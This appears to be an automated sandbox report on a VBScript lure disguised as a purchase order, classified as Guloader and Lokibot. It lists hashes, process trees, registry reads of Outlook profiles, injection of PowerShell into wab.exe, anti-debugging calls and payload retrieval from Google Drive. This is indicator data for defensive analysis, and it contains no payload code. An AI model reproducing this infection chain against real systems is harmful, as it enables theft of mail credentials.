Analysis Overview
SHA256
9e544c53dffc7c410220f17bc3a9f96f83f98a2bcdaa882183408d5194bf6a9e
Threat Level: Known bad
The file PO 05-03-2024 AKTINA-CDS.vbs was found to be: Known bad.
Malicious Activity Summary
Guloader,Cloudeye
Lokibot
Blocklisted process makes network request
Checks computer location settings
Accesses Microsoft Outlook profiles
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Suspicious use of NtCreateThreadExHideFromDebugger
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious behavior: MapViewOfSection
Suspicious behavior: EnumeratesProcesses
outlook_win_path
outlook_office_path
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-11 14:32
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-11 14:32
Reported
2024-03-11 14:34
Platform
win7-20231129-en
Max time kernel
119s
Max time network
127s
Command Line
Signatures
Guloader,Cloudeye
Lokibot
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1136 set thread context of 2796 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PO 05-03-2024 AKTINA-CDS.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| NL | 142.250.179.142:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | pki.goog | udp |
| US | 216.239.32.29:80 | pki.goog | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| NL | 142.251.36.33:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 88.221.134.146:80 | crl.microsoft.com | tcp |
| NL | 142.250.179.142:443 | drive.google.com | tcp |
| NL | 142.251.36.33:443 | drive.usercontent.google.com | tcp |
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3DQXVUI804L86F8K9D92.temp
| MD5 | ca01db601cb05e0bfb553367bd49d033 |
| SHA1 | a68268457978b2ff2d9d5329883b57709adf3f44 |
| SHA256 | 64c45a706f3d8ef66def539981f84534d395e9045359136a6d2c1e46d9e8c4f5 |
| SHA512 | 918c5370e72616e8c9de19fd1798145d9883886a39ab8752e1de4e145f27761ad464319eb17e50d470427d2b82c8fd957a619f5cc515f23f6ace11d74a8d130c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 211771b8306b4df71d2a1099cd2460e9 |
| SHA1 | d1ab514058c1e2058f0904fef16df876addce6be |
| SHA256 | 0e4a23b253b8c9a9f73cc646259ddf001c9ac9c089a3727bb78df33552f37628 |
| SHA512 | e773bb71e4db65c68a5997d380068976facbcab97c03c9f0c2bcd6b0c5b7e821cbb1bc116e78e130805ce45bd9444db9931626168ca767dcd6b54a51d5e5b525 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 753df6889fd7410a2e9fe333da83a429 |
| SHA1 | 3c425f16e8267186061dd48ac1c77c122962456e |
| SHA256 | b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78 |
| SHA512 | 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | ddcde6f00e701c39a183b23e268aa671 |
| SHA1 | fc1bcdc60cc8e9f5e37883539d20ea330edda727 |
| SHA256 | d88738ba308762b61429ac0b4be38b963ab91db5a91d37b00c1a6a05dd96dfd8 |
| SHA512 | 1e1bd6018888c7ee898fdfb252dac9bb4ae4898c1de254dd2c0fe88593180c03694b0368d97b5f8bf94340c67d04584de9754236d86999c7ce42e431b0f7b68b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | a266bb7dcc38a562631361bbf61dd11b |
| SHA1 | 3b1efd3a66ea28b16697394703a72ca340a05bd5 |
| SHA256 | df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e |
| SHA512 | 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | f162ad07b9edfb1bddeb70b568f2466d |
| SHA1 | bc033077f34e28deff7e99265c05a68cf93ab1c0 |
| SHA256 | e1a611bae1f29f2a467af83c6d42186742a43146eea12eee15d4e2995cd8831d |
| SHA512 | 8ee786e70fefd98c67f7ddef244ea957e2e82b69207dd10274169e71685eb081c80c7c85898e81c8203ba4a5ab3ffe7bc31369dce1c19b59e845fb1bcb50e4e2 |
C:\Users\Admin\AppData\Local\Temp\TarC0B1.tmp
| MD5 | dd73cead4b93366cf3465c8cd32e2796 |
| SHA1 | 74546226dfe9ceb8184651e920d1dbfb432b314e |
| SHA256 | a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22 |
| SHA512 | ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-11 14:32
Reported
2024-03-11 14:34
Platform
win10v2004-20240226-en
Max time kernel
144s
Max time network
153s
Command Line
Signatures
Guloader,Cloudeye
Lokibot
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3976 set thread context of 4612 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PO 05-03-2024 AKTINA-CDS.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| NL | 142.250.179.142:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| NL | 142.251.36.33:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 142.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.36.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| NL | 142.250.179.142:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | 195.179.250.142.in-addr.arpa | udp |
| NL | 142.251.36.33:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.5.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.110.54.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pmwmh0cn.vnw.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |